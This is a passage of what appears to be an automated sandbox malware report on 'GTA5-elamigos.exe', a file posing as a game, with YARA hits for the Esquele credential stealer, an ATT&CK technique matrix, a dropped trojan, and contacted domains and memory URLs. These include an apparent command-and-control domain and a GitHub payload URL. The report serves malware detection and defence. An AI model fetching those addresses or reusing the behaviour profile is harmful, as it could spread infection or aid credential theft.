Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Esquele Stealer

Source: Yara match	File source: 00000000.00000003.2040181571.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2186944875.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2190655984.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2186572194.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187457928.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2193159338.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2043784374.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2042780701.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2189549532.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187591917.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187294963.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041506674.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187177452.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2046992835.0000024F20469000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GTA5-elamigos.exe PID: 6136, type: MEMORYSTR

Remote Access Functionality

Yara detected Esquele Stealer

Source: Yara match	File source: 00000000.00000003.2040181571.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2186944875.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2190655984.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2186572194.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187457928.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2193159338.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2043784374.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2042780701.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2189549532.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187591917.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187294963.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2041506674.0000024F2047C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187177452.0000024F20454000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2046992835.0000024F20469000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GTA5-elamigos.exe PID: 6136, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	2 Masquerading	OS Credential Dumping	111 Security Software Discovery	Remote Services	1 Archive Collected Data	12 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	22 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GTA5-elamigos.exe	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe	100%	Joe Sandbox ML
C:\WindowsTasks\Platform\App-rRrqar5TwQ\launcher.exe	22%	ReversingLabs	Win64.Trojan.Generic

Source	Detection	Scanner	Label
https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-network-error	0%	Avira URL Cloud	safe
https://url.spec.whatwg.org/#port-state	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-headers-append	0%	Avira URL Cloud	safe
https://w3c.github.io/permissions/#permissionstatus	0%	Avira URL Cloud	safe
https://streams.spec.whatwg.org/	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-headers-fill	0%	Avira URL Cloud	safe
https://dom.spec.whatwg.org/#get-the-parent	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#forbidden-response-header-name	0%	Avira URL Cloud	safe
https://dl.deno.land/canary/	0%	Avira URL Cloud	safe
https://dom.spec.whatwg.org/#concept-event-listener-invoke	0%	Avira URL Cloud	safe
https://dom.spec.whatwg.org/#retarget	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#body-mixin	0%	Avira URL Cloud	safe
https://w3c.github.io/permissions/#status-of-a-permission	0%	Avira URL Cloud	safe
https://crbug.com/v8/8520turbo_fast_api_callsenable	0%	Avira URL Cloud	safe
https://w3c.github.io/permissions/#permission-descriptor	0%	Avira URL Cloud	safe
https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-heade	0%	Avira URL Cloud	safe
https://w3c.github.io/FileAPI/	0%	Avira URL Cloud	safe
https://url.spec.whatwg.org/#idna	0%	Avira URL Cloud	safe
https://wicg.github.io/import-maps/	0%	Avira URL Cloud	safe
https://some/file.ts	0%	Avira URL Cloud	safe
https://dl.deno.land/canary/P	0%	Avira URL Cloud	safe
https://dom.spec.whatwg.org/#concept-event-path-append	0%	Avira URL Cloud	safe
https://dl.deno.land/canary-latest.txt	0%	Avira URL Cloud	safe
https://dom.spec.whatwg.org/#event-path	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-construct-readablestream	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#dom-headers	0%	Avira URL Cloud	safe
https://w3c.github.io/user-timing)	0%	Avira URL Cloud	safe
https://fetch.spec.whatwg.org/#concept-headeP	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
skeletonwatcher.rest	188.114.96.3	true	false		unknown
raw.githubusercontent.com	185.199.108.133	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.rapidtables.com/convert/color/hsl-to-rgb.html	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fetch.spec.whatwg.org/#concept-headers-append	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dom.spec.whatwg.org/#concept-event-listener-inner-invoke	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deno.land/std/examples/colors.tsGenerate	GTA5-elamigos.exe	false		high
https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false		high
https://url.spec.whatwg.org/#special-scheme	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://fetch.spec.whatwg.org/#forbidden-response-header-name	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fetch.spec.whatwg.org/#concept-network-error	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://url.spec.whatwg.org/#port-state	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fetch.spec.whatwg.org/#concept-headers-fill	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/denoland/deno/issues	GTA5-elamigos.exe	false		high
https://streams.spec.whatwg.org/	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fetch.spec.whatwg.org/#ref-for-dom-body-formdata	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/beatgammit/base64-js	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deno.land/x/example/types.d.ts	GTA5-elamigos.exe	false		high
https://deno.land/std/fmt/colors.ts	GTA5-elamigos.exe	false		high
https://console.spec.whatwg.org/#console-namespace	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://no-color.org/	GTA5-elamigos.exe	false		high
https://www.npmjs.com/package/tslib).	GTA5-elamigos.exe	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Instanc	GTA5-elamigos.exe	false		high
https://dom.spec.whatwg.org/#get-the-parent	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://w3c.github.io/permissions/#permissionstatus	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://deno.land/x/	GTA5-elamigos.exe	false		high
https://dom.spec.whatwg.org/#concept-event-listener-invoke	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000003.00000002.2171606551.000001B01779E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171606551.000001B0178E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1D7D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deno.land/favicon.icodevtools://devtools/bundled/inspector.html?v8only=true&ws=	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	false		high
https://crbug.com/v8/8520turbo_fast_api_callsenable	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D91E000.00000002.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/en-US/docs/Web/API/WindowOrWorkerGlobalScope	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deno.land/manual/runtime/compiler_apis#denobundle).	GTA5-elamigos.exe	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.2157122606.000001B007731000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2294693432.000001DAC1D16000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/bitinn/node-fetch/blob/master/src/headers.js	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/LinkErr	GTA5-elamigos.exe	false		high
https://w3c.github.io/permissions/#status-of-a-permission	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://developer.mozilla.org/)	GTA5-elamigos.exe	false		high
https://dl.deno.land/canary/	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://fetch.spec.whatwg.org/#body-mixin	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/inexorabletash/text-encoding	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000003.00000002.2157122606.000001B008363000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2294693432.000001DAC2943000.00000004.00000800.00020000.00000000.sdmp	false		high
https://w3c.github.io/permissions/#permission-descriptor	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt9a	GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dom.spec.whatwg.org/#retarget	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fetch.spec.whatwg.org/#concept-heade	GTA5-elamigos.exe, 00000000.00000003.2358645571.0000024F20456000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://golang.org/pkg/bytes/#Buffer.Grow).	GTA5-elamigos.exe	false		high
https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2294693432.000001DAC1F43000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/compile	GTA5-elamigos.exe	false		high
https://www.catcert.net/verarrel	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp, GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://myserver.com	GTA5-elamigos.exe	false		high
https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt):	GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408482000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2192321844.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2191437630.0000024F20585000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2337536086.0000024F20585000.00000004.00000020.00020000.00000000.sdmp	false		high
https://w3c.github.io/FileAPI/	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://golang.org/pkg/bytes/#Buffer).	GTA5-elamigos.exe	false		high
https://github.com/beatgammit/base64-js/issues/42	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://url.spec.whatwg.org/#idna	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dom.spec.whatwg.org/#concept-event-path-append	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Microsoft/TypeScript/issues/2577)	GTA5-elamigos.exe	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Memory)	GTA5-elamigos.exe	false		high
https://github.com/golang/go/blob/master/LICENSE	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Compile	GTA5-elamigos.exe	false		high
https://github.com/WICG/import-maps#the-import-mapSet	GTA5-elamigos.exe	false		high
http://man7.org/linux/man-pages/man2/shutdown.2.html	GTA5-elamigos.exe	false		high
https://wicg.github.io/import-maps/	GTA5-elamigos.exe	false	Avira URL Cloud: safe	unknown
http://html4/loose.dtd	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp	false		high
https://github.com/ctz/webpki-roots	GTA5-elamigos.exe	false		high
https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8	GTA5-elamigos.exe, 00000000.00000000.2021303086.00007FF70D210000.00000002.00000001.01000000.00000003.sdmp, GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408502000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2339896896.000001E408502000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2186656296.000001E408502000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/validat	GTA5-elamigos.exe	false		high
https://deno.land/std/examples/cat.ts	GTA5-elamigos.exe	false		high
https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt9	GTA5-elamigos.exe, 00000000.00000003.2358997536.0000024F1EA37000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc2046#section-5.1	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/github/fetch/blob/master/fetch.js	GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E408182000.00000004.00001000.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2338046600.000001DAD1EBF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/WebAssembly/Table)	GTA5-elamigos.exe	false		high
https://github.com/vadimg/js_bintrees.	GTA5-elamigos.exe, 00000000.00000003.2023572391.000001E4081C2000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2024234137.0000024F203B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://raw.githubusercontent.com/EsqueleStealer/EsqueleStealer-D-/main/estl.txt	GTA5-elamigos.exe, 00000000.00000003.2185641806.000001E408482000.00000004.00001000.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2195707519.0000024F20461000.00000004.00000020.00020000.00000000.sdmp, GTA5-elamigos.exe, 00000000.00000003.2191642086.0000024F20461000.00000004.00000020.00020000.00000000.sdmp	false		high
https://deno.land/manual/linking_to_external_code/import_maps	GTA5-elamigos.exe	false		high
https://dom.spec.whatwg.org/#event-path	GTA5-elamigos.exe, 00000000.00000003.2185387416.000001E408102000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
